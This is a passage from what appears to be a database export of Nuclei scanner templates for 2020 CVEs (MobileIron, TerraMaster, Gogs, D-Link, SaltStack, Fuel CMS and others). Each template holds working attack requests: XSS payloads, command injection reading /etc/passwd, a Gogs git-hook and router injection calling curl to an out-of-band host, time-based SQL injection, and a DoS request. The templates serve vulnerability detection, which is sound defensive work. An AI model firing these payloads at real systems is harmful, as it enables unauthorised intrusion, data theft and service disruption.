'{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"'>\\\"\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b82ba9a13156e4a5f1bb8fd1ad13f264d34bd2681f97b51a91d33f002823962a02206f63f05020c012282120b381b87214144f8585fc8d81b8e61d1b1614ca448dae:922c64590222798bb761d5b6d8e72950", "hash": "05b3fc304e2e06b3271c09af0726b76f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819d" }, "name": "CVE-2020-15505.yaml", "content": "id: CVE-2020-15505\n\n# THIS TEMPLATE IS ONLY FOR DETECTING\n# To carry out further attacks, please see reference[2] below.\n# This template works by passing a Hessian header, otherwise;\n# it will return a 403 or 500 internal server error. Reference[3].\ninfo:\n name: MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier contain a vulnerability that allows remote attackers to execute arbitrary code via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the MobileIron infrastructure.\n remediation: |\n Upgrade MobileIron Core & Connector and Sentry to versions above v10.6 & v9.8 respectively\n reference:\n - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html\n - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505\n - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10\n - https://github.com/orangetw/JNDI-Injection-Bypass\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15505\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-15505\n cwe-id: CWE-706\n epss-score: 0.97516\n epss-percentile: 0.99983\n cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mobileiron\n product: core\n tags: cve,cve2020,mobileiron,rce,sentry,kev\n\nhttp:\n - raw:\n - |\n POST /mifs/.;/services/LogService HTTP/1.1\n Host: {{Hostname}}\n Referer: https://{{Hostname}}\n Content-Type: x-application/hessian\n Connection: close\n\n {{hex_decode('630200480004')}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/x-hessian\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cb486e35255661a61a9ea7919efde1778d1751b33daf11bdaeb7a8a0c6160013022054afe621fe262980cad5294740be6a4a1e8b4f36a802e5ff1e9532038c5e269c:922c64590222798bb761d5b6d8e72950", "hash": "4759243348916c5fb02ee339f43d3ce9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819e" }, "name": "CVE-2020-15568.yaml", "content": "id: CVE-2020-15568\n\ninfo:\n name: TerraMaster TOS <.1.29 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15568\n - https://help.terra-master.com/TOS/view/\n - https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568\n - https://github.com/n0bugz/CVE-2020-15568\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-15568\n cwe-id: CWE-913\n epss-score: 0.96623\n epss-percentile: 0.99607\n cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: terra-master\n product: tos\n tags: cve2020,cve,terramaster,rce,terra-master\nvariables:\n filename: \"{{to_lower(rand_text_alpha(4))}}\"\n\nhttp:\n - raw:\n - |\n GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n - |\n GET /include/{{filename}}.txt HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e784ad89af5c1b2c38362287c06a1f7f2ca94adb7a0d811daa81a252f34d401a02200ff9efa5d31f67a479a8e9292f31942deaf5c74cd69d13305223e94c25c60ac8:922c64590222798bb761d5b6d8e72950", "hash": "cfc95507fae01a26d004e2cf54b4d2f6", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819f" }, "name": "CVE-2020-15867.yaml", "content": "id: CVE-2020-15867\n\ninfo:\n name: Gogs 0.5.5 - 0.12.2 - Remote Code Execution\n author: theamanrawat\n severity: high\n description: |\n Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a \"product UI does not warn user of unsafe actions\" issue.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later).\n reference:\n - https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html\n - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/\n - http://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15867\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2020-15867\n epss-score: 0.96659\n epss-percentile: 0.99554\n cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 7\n vendor: gogs\n product: gogs\n tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive\n\nhttp:\n - raw:\n - |\n GET /user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /user/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n - |\n GET /repo/create HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /repo/create HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n - |\n POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n - |\n GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: word\n part: body_1\n words:\n - content=\"Gogs\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - name=\"_csrf\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: auth_csrf\n group: 1\n regex:\n - name=\"_csrf\" content=\"(.*)\"\n internal: true\n\n - type: regex\n name: last_commit\n group: 1\n regex:\n - name=\"last_commit\" value=\"(.*)\"\n internal: true\n# digest: 4a0a004730450221009a215b7c44f2fb218def60e0d879afe798183c5f934d27d519c1f12a15ae90bd022071abea3ccb7139b8aaf1d296ad270e2afd6df803ea81281e87c092e97711d955:922c64590222798bb761d5b6d8e72950", "hash": "d353285bca3adb3c8fef6b0713a3166a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a0" }, "name": "CVE-2020-15895.yaml", "content": "id: CVE-2020-15895\n\ninfo:\n name: D-Link DIR-816L 2.x - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n D-Link DIR-816L devices 2.x before 1.10b04Beta02 contains a cross-site scripting vulnerability. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter before being printed on the webpage. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow for theft of cookie-based authentication credentials and launch of other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest firmware update provided by D-Link to mitigate this vulnerability.\n reference:\n - https://research.loginsoft.com/bugs/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/\n - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15895\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-15895\n cwe-id: CWE-79\n epss-score: 0.00187\n epss-percentile: 0.55045\n cpe: cpe:2.3:o:dlink:dir-816l_firmware:2.06:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dir-816l_firmware\n shodan-query: html:\"DIR-816L\"\n tags: cve2020,cve,dlink,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/info.php?RESULT=\\\",msgArray);alert(document.domain);//\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \";alert(document.domain);\"\n - \"DIR-816L\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cc380765700ef1b2b7da3e313af50c0fde3da0fbfcd22a8d457ce221e7fc062b022054cf01c8bbed23df43e959ca8c4f1ca8a91b866aabce40c770d01b43ec7468eb:922c64590222798bb761d5b6d8e72950", "hash": "2f82c7b0c3d0b08ba1b72ec1278ea8a8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a1" }, "name": "CVE-2020-15920.yaml", "content": "id: CVE-2020-15920\n\ninfo:\n name: Mida eFramework <=2.9.0 - Remote Command Execution\n author: dwisiswant0\n severity: critical\n description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n remediation: |\n Upgrade Mida eFramework to a version higher than 2.9.0 to mitigate the vulnerability.\n reference:\n - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html\n - http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html\n - http://packetstormsecurity.com/files/159194/Mida-Solutions-eFramework-ajaxreq.php-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15920\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-15920\n cwe-id: CWE-78\n epss-score: 0.9722\n epss-percentile: 0.998\n cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: midasolutions\n product: eframework\n tags: cve2020,cve,mida,rce,packetstorm,midasolutions\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206f5a3ec45a1ae6604575d375e689df1c77957a24b7578c7ad5847a39d7570683022100cfa88e83a5104ca5de5e02b21eadad357a26dd37838c9c77f95c643dc5296f39:922c64590222798bb761d5b6d8e72950", "hash": "27852d8b9d38dd8db42ab8e6219f0db6", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a2" }, "name": "CVE-2020-16139.yaml", "content": "id: CVE-2020-16139\n\ninfo:\n name: Cisco Unified IP Conference Station 7937G - Denial-of-Service\n author: pikpikcu\n severity: high\n description: |\n Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.\n impact: |\n An attacker can exploit this vulnerability to disrupt the functionality of the conference station, leading to a denial of service for legitimate users.\n remediation: |\n Apply the latest firmware update provided by Cisco to mitigate this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html\n - https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-16139\n - https://github.com/anonymous364872/Rapier_Tool\n - https://github.com/blacklanternsecurity/Cisco-7937G-PoCs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n cvss-score: 7.5\n cve-id: CVE-2020-16139\n epss-score: 0.06015\n epss-percentile: 0.93331\n cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: unified_ip_conference_station_7937g_firmware\n tags: cve,cve2020,dos,cisco,packetstorm\n\nhttp:\n - raw:\n - |\n POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: word\n words:\n - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220159a501f6273ac0121f121b697bdc653c01a5330a5b0fe9fe2ccfa30a638147e022056695f2f7cd28cc34e9a3e87f3d7395878fbebdbc29b626b1b9f94c57c874c78:922c64590222798bb761d5b6d8e72950", "hash": "cf42a6ae5d3573c61f31004db69e0ecd", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a3" }, "name": "CVE-2020-16846.yaml", "content": "id: CVE-2020-16846\n\ninfo:\n name: SaltStack <=3002 - Shell Injection\n author: dwisiswant0\n severity: critical\n description: |\n SaltStack Salt through 3002 allows an unauthenticated user with network access to the Salt API to use shell injections to run code on the Salt-API using the SSH client.\n remediation: |\n Upgrade to a patched version of SaltStack (>=3003) to mitigate this vulnerability.\n reference:\n - https://saltproject.io/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/\n - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag\n - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846\n - https://nvd.nist.gov/vuln/detail/CVE-2020-16846\n - http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00029.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-16846\n cwe-id: CWE-78\n epss-score: 0.97467\n epss-percentile: 0.99957\n cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: saltstack\n product: salt\n tags: cve2020,cve,vulhub,saltstack,kev\nvariables:\n priv: \"{{to_lower(rand_text_alpha(5))}}\"\n roaster: \"{{to_lower(rand_text_alpha(6))}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/run\"\n\n body: \"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}\"\n\n headers:\n Content-Type: application/x-www-form-urlencoded # CherryPy will abort w/o define this header\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)\n\n - type: word\n part: body\n words:\n - \"An unexpected error occurred\"\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100e5e214d6bfbb716a422d227690fe14f4ced278baebc9530e6be6dda0c04edda5022100a4a672fdb2e3ed1d081264ca1f8709c46adb9bc876251bfd3a0495cb0c41ce47:922c64590222798bb761d5b6d8e72950", "hash": "5e7ff93fda9856f96fdc55b82cb277de", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a4" }, "name": "CVE-2020-16952.yaml", "content": "id: CVE-2020-16952\n\ninfo:\n name: Microsoft SharePoint - Remote Code Execution\n author: dwisiswant0\n severity: high\n description: Microsoft SharePoint is vulnerable to a remote code execution when the software fails to check the source markup of an application package.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to a complete compromise of the SharePoint server.\n remediation: |\n Apply the latest security updates provided by Microsoft to address this vulnerability.\n reference:\n - https://srcincite.io/pocs/cve-2020-16952.py.txt\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952\n - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-16952\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L\n cvss-score: 8.6\n cve-id: CVE-2020-16952\n cwe-id: CWE-346\n epss-score: 0.90125\n epss-percentile: 0.9872\n cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: sharepoint_enterprise_server\n tags: cve,cve2020,msf,sharepoint,iis,microsoft,ssi,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"15\\\\.0\\\\.0\\\\.(4571|5275|4351|5056)\"\n - \"16\\\\.0\\\\.0\\\\.(10337|10364|10366)\"\n # - \"16.0.10364.20001\"\n condition: or\n\n - type: regex\n part: header\n regex:\n - \"(?i)(Microsoftsharepointteamservices:)\"\n\n - type: status\n status:\n - 200\n - 201\n condition: or\n# digest: 4b0a00483046022100e0bdde1f10a3c7f9e1773ab527f8cb52ceb62bee9d4dd6c22904db572ee54ac9022100e7db923ffc75f38ed9852638743eae25f446b79004905c011578b05d3c7cfc47:922c64590222798bb761d5b6d8e72950", "hash": "5162d357445c8ebe91411fc4b171e968", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a5" }, "name": "CVE-2020-17362.yaml", "content": "id: CVE-2020-17362\n\ninfo:\n name: Nova Lite < 1.3.9 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to Nova Lite version 1.3.9 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17362\n - https://themes.trac.wordpress.org/browser/nova-lite/1.3.9/readme.txt?rev=134076\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-17362\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.412\n cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: themeinprogress\n product: nova_lite\n framework: wordpress\n tags: cve2020,cve,wordpress,xss,wp-plugin,wpscan,unauth,themeinprogress\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: body\n words:\n - \"nova-lite\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ab34023f96ff9b73ad9b41e60f530d15a806426ebaf266dfa573af429f707066022027a8e1e0e951dbd0be795667ca7497abc9000048460f06fbe56fd555a9416315:922c64590222798bb761d5b6d8e72950", "hash": "4c0b2aeffcbba93f1e69d6713f82e751", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a6" }, "name": "CVE-2020-17453.yaml", "content": "id: CVE-2020-17453\n\ninfo:\n name: WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade to a patched version of WSO2 Carbon Management Console (5.11 or above) or apply the provided security patch to mitigate this vulnerability.\n reference:\n - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17453\n - https://twitter.com/JacksonHHax/status/1374681422678519813\n - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2020-1132/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-17453\n cwe-id: CWE-79\n epss-score: 0.00845\n epss-percentile: 0.81776\n cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wso2\n product: api_manager\n tags: cve2020,cve,xss,wso2\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'';alert('document.domain')//';\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210092b852f9302eb1a2350db061c59c70735a053c59eb95b4415e36f93732431357022100c8e4a5c459eca3f34966e4ce587f09ac4174a89e0f127b7c9a14f5cf381d461b:922c64590222798bb761d5b6d8e72950", "hash": "0862ef39223a709499fe93e02a292cdd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a7" }, "name": "CVE-2020-17456.yaml", "content": "id: CVE-2020-17456\n\ninfo:\n name: SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution\n author: gy741,edoardottt\n severity: critical\n description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17456\n - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html\n - http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html\n - https://www.exploit-db.com/exploits/50821\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-17456\n cwe-id: CWE-78\n epss-score: 0.96263\n epss-percentile: 0.99495\n cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: seowonintech\n product: slc-130_firmware\n tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/login.cgi HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}\n Content-Type: application/x-www-form-urlencoded\n\n browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n - |\n POST /cgi-bin/system_log.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dfd063b9fa64a8c67ede0a35c9c5ef23fc7ffd9b31d32de5343eaa430bd12815022063f498b2e3e49255cc16b78a9ae2e77f66144915d845e6feae3ced267930d7a9:922c64590222798bb761d5b6d8e72950", "hash": "fdab899cb6e902ff83753d06c5636129", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a8" }, "name": "CVE-2020-17463.yaml", "content": "id: CVE-2020-17463\n\ninfo:\n name: Fuel CMS 1.4.7 - SQL Injection\n author: Thirukrishnan\n severity: critical\n description: |\n FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: Fixed in version 115\n reference:\n - https://www.exploit-db.com/exploits/48741\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17463\n - http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html\n - https://getfuelcms.com/\n - https://cwe.mitre.org/data/definitions/89.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-17463\n cwe-id: CWE-89\n epss-score: 0.94399\n epss-percentile: 0.99154\n cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: thedaylightstudio\n product: fuel_cms\n shodan-query: http.title:\"fuel cms\"\n tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio\n\nhttp:\n - raw:\n - |\n GET /fuel/login/ HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /fuel/login/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{RootURL}}\n\n user_name={{username}}&password={{password}}&Login=Login&forward=\n - |\n @timeout: 10s\n GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\n Host: {{Hostname}}\n X-Requested-With: XMLHttpRequest\n Referer: {{RootURL}}\n\n payloads:\n username:\n - admin\n password:\n - admin\n attack: pitchfork\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code_3 == 200'\n - 'contains(body_1, \"FUEL CMS\")'\n condition: and\n# digest: 